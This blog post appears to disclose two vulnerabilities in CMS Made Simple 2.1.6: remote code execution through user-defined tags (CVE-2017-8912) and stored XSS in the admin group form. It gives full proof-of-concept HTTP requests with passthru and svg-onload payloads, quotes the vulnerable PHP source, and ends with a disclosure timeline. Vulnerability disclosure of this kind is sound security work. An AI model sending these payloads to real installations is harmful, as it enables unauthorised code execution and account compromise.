CMSMS 2.1.6 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Remote Code Execution – CVE-2017-8912

In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.

POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4
Content-Length: 115
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=2a7da2216d41e0ac; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Pragma: no-cache
Cache-Control: no-cache

_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1 



File: lib/classes/class.usertagoperations.inc.php
Line: 251

function CallUserTag($name, &$params)
	{
		$row = $this->_get_from_cache($name);
		$result = FALSE;
		if( $row ) {
			$smarty = CmsApp::get_instance()->GetSmarty();
			$functionname = $this->CreateTagFunction($name);
			$result = call_user_func_array($functionname, array(&$params, &$smarty));
		}
		return $result;
	}

function CreateTagFunction($name)
	{
		$row = $this->_get_from_cache($name);
		if( !$row ) return;
		$functionname = 'cms_user_tag_'.$name;
		if( !function_exists($functionname) ) {
			if( startswith($row['code'],'<?php') ) $row['code'] = substr($row['code'],5);
			if( endswith($row['code'],'?>') ) $row['code'] = substr($row['code'],0,-2);
			$code = 'function '.$functionname.'($params,&$smarty) {'.$row['code']."\n}";
			@eval($code);
		}
		return $functionname;

The function ‘CreateTagFunction’ will create an executable function and ‘call_user_func_array’ in ‘CallUserTag’ that will execute our code.

In a corporate network once an attacker finds admin credentials by accessing the database and if he finds CMSMS he can easily get a reverse shell on the box. Reminds me of some boxes in the PWK lab 😉

Stored XSS

File: admin/addgroup.php
Lines: 95, 99

<div class="pageoverflow">
    <p class="pagetext"><label for="groupname">*<?php echo lang('name')?>:</label></p>
    <p class="pageinput"><input type="text" id="groupname" name="group" maxlength="255" value="<?php echo $group?>" /></p>
  </div>
  <div class="pageoverflow">
    <p class="pagetext"><label for="description"><?php echo lang('description')?>:</label></p>
    <p class="pageinput"><input type="text" id="description" name="description" maxlength="255" size="80" value="<?php echo $description?>" /></p>
  </div>

The ‘groupname’ and ‘description’ fields are not properly sanitized, thus leading to XSS.

POST /cms/cmsimple/admin/addgroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cms/cmsimple/admin/addgroup.php?_sk_=92a32a8aaa87e958
Cookie: cms_admin_user_id=1; cms_passhash=4df45e48ad5885afabe27e446666421b; _sk_=92a32a8aaa87e958; CMSSESSIDacef9ab5f31b=mckpbvrmtj7n6ri53kiol718c5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true

Disclosure Timeline

09-05-2017: Reported to the vendor
09-05-2017: Vendor doesn’t accept XSS issues inside admin panel and claimed the RCE as a feature, not a bug 🙂
10-05-2017: Public disclosure
11-05-2017: Assigned CVE-2017-8912

https://www.exploit-db.com/exploits/41997/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8912
https://nvd.nist.gov/vuln/detail/CVE-2017-8912

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s